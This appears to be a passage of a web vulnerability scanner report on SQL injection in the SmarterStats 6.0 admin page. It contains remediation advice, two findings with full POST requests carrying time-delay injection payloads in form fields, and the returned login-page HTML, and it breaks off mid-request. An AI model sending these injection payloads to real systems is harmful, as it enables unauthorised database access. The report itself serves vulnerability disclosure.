The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtSmarterLogDirectory parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24txtSmarterLogDirectory parameter. The application took 25540 milliseconds to respond to the request, compared with 134 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs'waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngin
eSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=[__VIEWSTATE base64 blob omitted]&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:00:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8607
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;DA&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dDA\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


2.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter. The application took 16658 milliseconds to respond to the request, compared with 282 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngine
Settings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=%2fwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlb
nQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGFyaXM8KEdNVCswMTowMCkgQW1zdGVyZGFtLCBCZXJsaW4sIEJlcm4sIFJvbWUsIFN0b2NraG9sbSwgVmllbm5hHyhHTVQrMDE6MDApIFdlc3QgQ2VudHJhbCBBZnJpY2EnKEdNVCswMjowMCkgQXRoZW5zLCBCdWNoYXJlc3QsIElzdGFuYnVsEihHTVQrMDI6MDApIEJlaXJ1dBEoR01UKzAyOjAwKSBBbW1hbhUoR01UKzAyOjAwKSBKZXJ1c2FsZW0UKEdNV
CswMjowMCkgV2luZGhvZWs5KEdNVCswMjowMCkgSGVsc2lua2ksIEt5aXYsIFJpZ2EsIFNvZmlhLCBUYWxsaW5uLCBWaWxuaXVzHChHTVQrMDI6MDApIEhhcmFyZSwgUHJldG9yaWERKEdNVCswMjowMCkgTWluc2sRKEdNVCswMjowMCkgQ2Fpcm8TKEdNVCswMzowMCkgTmFpcm9iaS0oR01UKzAzOjAwKSBNb3Njb3csIFN0LiBQZXRlcnNidXJnLCBWb2xnb2dyYWQaKEdNVCswMzowMCkgS3V3YWl0LCBSaXlhZGgTKEdNVCswMzowMCkgQmFnaGRhZBMoR01UKzAzOjAwKSBUYmlsaXNpEihHTVQrMDM6MzApIFRlaHJhbh0oR01UKzA0OjAwKSBBYnUgRGhhYmksIE11c2NhdCIoR01UKzA0OjAwKSBDYXVjYXN1cyBTdGFuZGFyZCBUaW1lEChHTVQrMDQ6MDApIEJha3UTKEdNVCswNDowMCkgWWVyZXZhbhEoR01UKzA0OjMwKSBLYWJ1bBgoR01UKzA1OjAwKSBFa2F0ZXJpbmJ1cmcoKEdNVCswNTowMCkgSXNsYW1hYmFkLCBLYXJhY2hpLCBUYXNoa2VudB8oR01UKzA1OjMwKSBTcmkgSmF5YXdhcmRlbmVwdXJhLyhHTVQrMDU6MzApIENoZW5uYWksIEtvbGthdGEsIE11bWJhaSwgTmV3IERlbGhpFShHTVQrMDU6NDUpIEthdGhtYW5kdR8oR01UKzA2OjAwKSBBbG1hdHksIE5vdm9zaWJpcnNrGShHTVQrMDY6MDApIEFzdGFuYSwgRGhha2EcKEdNVCswNjozMCkgWWFuZ29uIChSYW5nb29uKRcoR01UKzA3OjAwKSBLcmFzbm95YXJzayMoR01UKzA3OjAwKSBCYW5na29rLCBIYW5vaSwgSmFrYXJ0YREoR01UKzA4OjAwKSBQZXJ0aDEoR01UKzA4OjAwKSBCZWlqaW5nLCBDaG9uZ3FpbmcsIEhvbmcgS29uZywgVXJ1bXFpIShHTVQrMDg6MDApIElya3V0c2ssIFVsYWFuIEJhdGFhchIoR01UKzA4OjAwKSBUYWlwZWkjKEdNVCswODowMCkgS3VhbGEgTHVtcHVyLCBTaW5nYXBvcmUTKEdNVCswOTowMCkgWWFrdXRzaxEoR01UKzA5OjAwKSBTZW91bCEoR01UKzA5OjAwKSBPc2FrYSwgU2FwcG9ybywgVG9reW8UKEdNVCswOTozMCkgQWRlbGFpZGUSKEdNVCswOTozMCkgRGFyd2luHihHTVQrMTA6MDApIEd1YW0sIFBvcnQgTW9yZXNieScoR01UKzEwOjAwKSBDYW5iZXJyYSwgTWVsYm91cm5lLCBTeWRuZXkXKEdNVCsxMDowMCkgVmxhZGl2b3N0b2sUKEdNVCsxMDowMCkgQnJpc2JhbmUSKEdNVCsxMDowMCkgSG9iYXJ0LyhHTVQrMTE6MDApIE1hZ2FkYW4sIFNvbG9tb24gSXMuLCBOZXcgQ2FsZWRvbmlhKShHTVQrMTI6MDApIEZpamksIEthbWNoYXRrYSwgTWFyc2hhbGwgSXMuIChHTVQrMTI6MDApIEF1Y2tsYW5kLCBXZWxsaW5ndG9uFihHTVQrMTM6MDApIE51a3UnYWxvZmEVVwEwATEBMgEzCy0yMTQ3NDgzNTc5ATQLLTIxNDc0ODM1ODACMTACMTUCMTMCMjUCMzACMjALLTIxNDc0ODM1ODECMzMCMzUCNDACNDULLTIxNDc0ODM1NzMLLTIxNDc0ODM1NzYCNTACNTUCNTYCNjACNzACNzMCNjULLTIxNDc0ODM1NzUCNzUCODACODMCOTACODUCOTUDMTAwAzEwNQMxMTADMTEzAzEzMAstMjE0NzQ4MzU4MwstMjE0NzQ4MzU4MgMxMzULLTIxNDc0ODM1NzgDMTI1AzE0MAMxM
